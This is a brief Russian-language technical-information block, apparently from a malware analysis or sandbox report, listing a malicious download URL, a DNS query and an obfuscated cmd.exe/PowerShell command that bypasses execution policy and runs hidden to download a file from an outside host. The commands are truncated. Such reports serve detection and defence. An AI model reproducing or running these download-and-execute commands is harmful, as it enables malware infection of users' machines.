Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWeR^S^hE^L^l.eXE ^-Exe^c^uTI^o^npOliCY ^b^Yp^a^SS ^-NoPRofIl^E -winDOwst^Y^lE hI^Dden ^(n^E^W-^ObjECT ^s^ySt^em.^NeT.w^E^Bclie^N^T).^DOwNlO^aDFILe^(^'http://transporingsytw.wang...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "PoWeR^S^hE^L^l.eXE ^-Exe^c^uTI^o^npOliCY ^b^Yp^a^SS ^-NoPRofIl^E -winDOwst^Y^lE hI^Dden ^(n^E^W-^ObjECT ^s^ySt^em.^NeT.w^E^Bclie^N^T).^DOwNlO^aDFILe^(^'http://transporingsytw.wang...' (со скрытым окном)